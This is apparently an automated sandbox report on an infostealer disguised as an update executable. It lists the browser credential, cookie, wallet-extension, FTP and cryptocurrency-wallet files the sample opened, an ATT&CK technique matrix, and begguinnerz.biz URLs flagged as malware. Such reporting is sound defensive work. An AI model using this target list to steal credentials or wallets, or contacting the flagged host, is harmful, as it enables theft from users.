              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Native API
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              231
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares41
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://begguinnerz.biz/pi100%Avira URL Cloudmalware
              https://begguinnerz.biz:443/apioQ100%Avira URL Cloudmalware
              https://begguinnerz.biz/U100%Avira URL Cloudmalware
              https://begguinnerz.biz/ym100%Avira URL Cloudmalware
              https://begguinnerz.biz/apiam100%Avira URL Cloudmalware
              https://begguinnerz.biz/100%Avira URL Cloudmalware
              https://begguinnerz.biz/An100%Avira URL Cloudmalware
              https://begguinnerz.biz/1ner100%Avira URL Cloudmalware
              https://begguinnerz.biz:443/apin.txtPK100%Avira URL Cloudmalware
              begguinnerz.biz100%Avira URL Cloudmalware
              https://begguinnerz.biz/api19100%Avira URL Cloudmalware
              https://begguinnerz.biz/apis100%Avira URL Cloudmalware
              https://begguinnerz.biz/pian100%Avira URL Cloudmalware
